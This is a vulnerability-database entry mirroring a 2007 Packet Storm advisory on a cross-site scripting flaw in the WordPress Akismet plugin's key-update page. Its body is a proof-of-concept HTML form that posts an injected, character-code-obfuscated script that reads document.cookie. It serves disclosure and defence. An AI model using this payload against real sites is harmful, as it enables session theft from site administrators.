Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

akismet-xss.txt

๐Ÿ—“๏ธย 15 May 2007ย 00:00:00Reported byย beNiTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

Akismet XSS security flaw on Akismet key update for

Show more
Code
`-------------------- CODE -----------------------------  
<html>  
<body>  
<form   
action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config"  
method="post" id="akismet-conf">  
  
<input name="_wpnonce" value="'" type="text">  
<input name="_wp_http_referer"   
value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"   
type="text">  
  
<input id="key" name="key" size="15" maxlength="12" value="1337">  
<input name="submit" value="Update options ยป" type="submit">  
</form>  
</body>  
</html>  
-------------------- EOC ------------------------------  
  
http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/  
  
--   
benjamin "beNi"  
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi  
  
(coolest guy in da hood)  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
xssakismetsecurity
18
.json
Report